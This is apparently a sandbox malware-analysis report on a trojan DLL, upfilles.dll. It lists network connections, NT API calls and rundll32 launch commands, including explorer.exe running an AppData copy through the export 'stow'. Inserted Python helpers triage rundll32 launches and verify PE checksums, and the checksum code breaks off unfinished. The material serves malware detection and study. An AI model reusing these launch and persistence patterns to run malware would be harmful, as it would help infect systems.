Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown HTTPS traffic detected: 91.194.11.183:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 138.124.183.215:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 54.175.181.104:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 95.164.68.73:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.155:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800012B0 NtConnectPort,NtRequestWaitReplyPort,NtRequestPort, 6_2_00000001800012B0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180001490 NtCreateSection,LocalAlloc,LocalAlloc,NtConnectPort,NtRequestWaitReplyPort, 6_2_0000000180001490
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180001650 RtlInitUnicodeString,NtClose,NtClose,RtlNtStatusToDosError,SetLastError,LocalFree,LocalFree,LocalFree,LocalFree, 6_2_0000000180001650
Source: C:\Windows\System32\rundll32.exe Code function: 18_3_000002921300D31C NtProtectVirtualMemory, 18_3_000002921300D31C
Source: C:\Windows\System32\rundll32.exe Code function: 18_3_000002921300D2AC NtAllocateVirtualMemory, 18_3_000002921300D2AC
Source: C:\Windows\explorer.exe Code function: 22_2_013A6814 NtFreeVirtualMemory, 22_2_013A6814
Source: C:\Windows\explorer.exe Code function: 22_2_013A958C NtAllocateVirtualMemory, 22_2_013A958C
Source: C:\Windows\explorer.exe Code function: 22_2_013AA5CC NtDelayExecution, 22_2_013AA5CC
Source: C:\Windows\explorer.exe Code function: 22_2_013A6728 NtWriteFile, 22_2_013A6728
Source: C:\Windows\explorer.exe Code function: 22_2_013A6618 RtlInitUnicodeString,NtCreateFile, 22_2_013A6618
Source: C:\Windows\explorer.exe Code function: 22_2_013A650C RtlInitUnicodeString,NtCreateFile,NtClose, 22_2_013A650C
Source: C:\Windows\explorer.exe Code function: 22_2_013A6464 RtlInitUnicodeString,NtOpenFile,NtClose, 22_2_013A6464
Source: C:\Windows\explorer.exe Code function: 22_2_013A67A0 NtClose, 22_2_013A67A0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001C030 6_2_000000018001C030
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018000A040 6_2_000000018000A040
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800190AC 6_2_00000001800190AC
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180001950 6_2_0000000180001950
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018000B992 6_2_000000018000B992
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800131E0 6_2_00000001800131E0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018000E200 6_2_000000018000E200
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018000B210 6_2_000000018000B210
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800192B8 6_2_00000001800192B8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180020B88 6_2_0000000180020B88
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180004C00 6_2_0000000180004C00
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180013448 6_2_0000000180013448
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001C45C 6_2_000000018001C45C
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018000C480 6_2_000000018000C480
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001EC90 6_2_000000018001EC90
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800154A0 6_2_00000001800154A0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180023584 6_2_0000000180023584
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800176FC 6_2_00000001800176FC
Source: C:\Windows\System32\rundll32.exe Code function: 18_2_00000292116E254C 18_2_00000292116E254C
Source: C:\Windows\System32\rundll32.exe Code function: 18_2_000000026E7DFB4C 18_2_000000026E7DFB4C
Source: C:\Windows\explorer.exe Code function: 22_2_013A1030 22_2_013A1030
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6324 -s 344
Source: upfilles.dll.dll Binary or memory string: OriginalFilenameeppcom64.dllZ vs upfilles.dll.dll
Source: classification engine Classification label: mal100.troj.evad.winDLL@32/17@8/6
Source: C:\Windows\System32\rundll32.exe Code function: 18_3_00007DF4F0240000 CreateToolhelp32Snapshot,Process32First,Process32Next, 18_3_00007DF4F0240000
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018000AEB0 CoCreateInstance, 6_2_000000018000AEB0
Source: C:\Windows\System32\rundll32.exe Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7272
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7288
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:120:WilError_03
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6324
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6516
Source: C:\Windows\System32\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\ba1d38a4-2e70-4cdd-8ce4-6f972928d4e8 Jump to behavior
Source: upfilles.dll.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Source: upfilles.dll.dll ReversingLabs: Detection: 15%
Source: unknown Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\upfilles.dll.dll"
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6324 -s 344
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6516 -s 344
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7272 -s 344
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7288 -s 344
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1 Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow Jump to behavior
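The process-creation entries above mix sandbox harness noise (loaddll64.exe and cmd.exe probing the standard COM exports and ordinal #1 from the Desktop copy) with the one launch that matters: explorer.exe, which the loader injected into, starting rundll32.exe against a copy of the DLL in AppData\Roaming with the export "stow". The following Python is an added triage helper, not part of the Joe Sandbox report or of the sample; it parses lines in the report's own "Source: ... Process created: ..." format and scores each rundll32 launch on three heuristics (parent is explorer.exe, DLL sits in a user-writable directory, export name is not one of the standard COM/regsvr32 entry points). The export set, the directory list and the sample lines embedded below are assumptions taken from this report, not from any vendor rule.

```python
import re
from dataclasses import dataclass, field

# Exports that loaddll64.exe / regsvr32.exe call when probing a DLL in the sandbox.
# Anything else named on a rundll32 command line (here: "stow") is an export the
# author chose, and is the one worth looking at. Assumption: list built from this report.
STANDARD_EXPORTS = {"DllCanUnloadNow", "DllGetClassObject", "DllInstall",
                    "DllRegisterServer", "DllUnregisterServer", "DllMain"}

# Standard-user-writable directories. explorer.exe launching rundll32 against a DLL
# here matches the persistence pattern in the report, not a normal shell-extension load.
USER_WRITABLE = ("\\AppData\\Roaming\\", "\\AppData\\Local\\Temp\\", "\\Users\\Public\\")

# One "Process created" line in the report's listing format.
LINE_RE = re.compile(
    r"^Source: (?P<parent>\S+) Process created: (?P<image>\S+) (?P<cmdline>.*?)"
    r"(?: Jump to behavior)?$")
# rundll32 <dll>,<export>, with or without quotes and with or without a space after the comma.
RUNDLL_RE = re.compile(
    r'rundll32\.exe"?\s+"?(?P<dll>[^",]+?)"?\s*,\s*(?P<export>\S+)', re.IGNORECASE)


@dataclass
class Finding:
    parent: str
    dll: str
    export: str
    reasons: list = field(default_factory=list)


def triage(line: str):
    """Parse one process-creation line; return a Finding for rundll32 launches, else None."""
    m = LINE_RE.match(line.strip())
    if not m or not m.group("image").lower().endswith("rundll32.exe"):
        return None
    r = RUNDLL_RE.search(m.group("cmdline"))
    if not r:
        return None
    parent = m.group("parent").rsplit("\\", 1)[-1].lower()
    dll, export = r.group("dll"), r.group("export")
    f = Finding(parent, dll, export)
    if parent == "explorer.exe":
        f.reasons.append("spawned by explorer.exe")
    if any(d.lower() in dll.lower() for d in USER_WRITABLE):
        f.reasons.append("DLL lives in a user-writable directory")
    # Ordinal exports (#1) are how the harness pokes the DLL; only named, non-standard exports are flagged.
    if export not in STANDARD_EXPORTS and not export.startswith("#"):
        f.reasons.append(f"non-standard export '{export}'")
    return f


def suspicious(lines):
    """Return only the rundll32 launches that tripped at least one heuristic."""
    out = []
    for line in lines:
        f = triage(line)
        if f and f.reasons:
            out.append(f)
    return out


# Sample input: five lines copied from the process-creation listing in this report.
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow Jump to behavior",
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1',
    r'Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow',
    r"Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll",
    r'Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow Jump to behavior',
]

if __name__ == "__main__":
    for f in suspicious(SAMPLE_LINES):
        print(f"{f.parent} -> rundll32 {f.dll},{f.export}: {'; '.join(f.reasons)}")
```

Run against the five sample lines, only two launches survive: the harness's own probe of the "stow" export from the Desktop copy (one reason) and the explorer.exe launch of the AppData\Roaming copy (all three). The Run value "Update" created further down in this section is the matching persistence entry; the report lists the value name but not its data, so the helper does not try to correlate the two.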
Source: C:\Windows\System32\loaddll64.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: upfilles.dll.dll Static PE information: Image base 0x180000000 > 0x60000000
Source: upfilles.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: upfilles.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: upfilles.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: upfilles.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: upfilles.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: upfilles.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: upfilles.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: X:\Gitlab\Builds\e945be61\0\lab\protectionplatform\Output\Release\x64\eppcom64.pdb source: rundll32.exe, 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1803925725.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1853230060.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1842561236.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.2936902948.0000000180025000.00000002.00000001.01000000.00000003.sdmp, upfilles.dll.dll
Source: upfilles.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: upfilles.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: upfilles.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: upfilles.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: upfilles.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: upfilles.dll.dll Static PE information: real checksum: 0x491bb should be: 0x85fc5
Source: upfilles.dll.dll Static PE information: section name: hVr
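The "real checksum: 0x491bb should be: 0x85fc5" entry above is the stored IMAGE_OPTIONAL_HEADER.CheckSum compared with the value recomputed over the file; a mismatch means the bytes were changed after the linker wrote the header (packing, patching, or a build that never set it). The Python below is an added example of that recomputation, not code from the report or from the sample's authors: it implements the imagehlp CheckSumMappedFile algorithm (the same one tools such as pefile reimplement) and, because the sample itself is not reproduced on this page, exercises it on a constructed header-only PE32+ image. The 0x491bb/0x85fc5 pair cannot be reproduced without the file; the function names and the minimal image builder are assumptions of this example.

```python
import struct


def checksum_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum: e_lfanew + 4 (PE sig) + 20 (COFF) + 0x40."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad e_lfanew / PE signature")
    off = e_lfanew + 24 + 0x40
    if off % 4:
        raise ValueError("unaligned PE header")  # the loader rejects such images anyway
    return off


def pe_checksum(data: bytes) -> int:
    """One's-complement 32-bit sum over every dword of the file except the CheckSum
    field itself (tail zero-padded to a dword), folded to 16 bits, plus the file length."""
    skip = checksum_offset(data)
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)  # end-around carry
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def verify(data: bytes):
    """Return (stored, computed, matches): the report's 'real checksum' vs 'should be' pair."""
    stored = struct.unpack_from("<I", data, checksum_offset(data))[0]
    computed = pe_checksum(data)
    return stored, computed, stored == computed


def build_minimal_pe(stored_checksum: int = 0, payload: bytes = b"") -> bytes:
    """Constructed sample (not the report's file): a header-only 64-bit DLL image."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics (EXECUTABLE_IMAGE | DLL | LARGE_ADDRESS_AWARE)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x2022)
    opt = bytearray(240)
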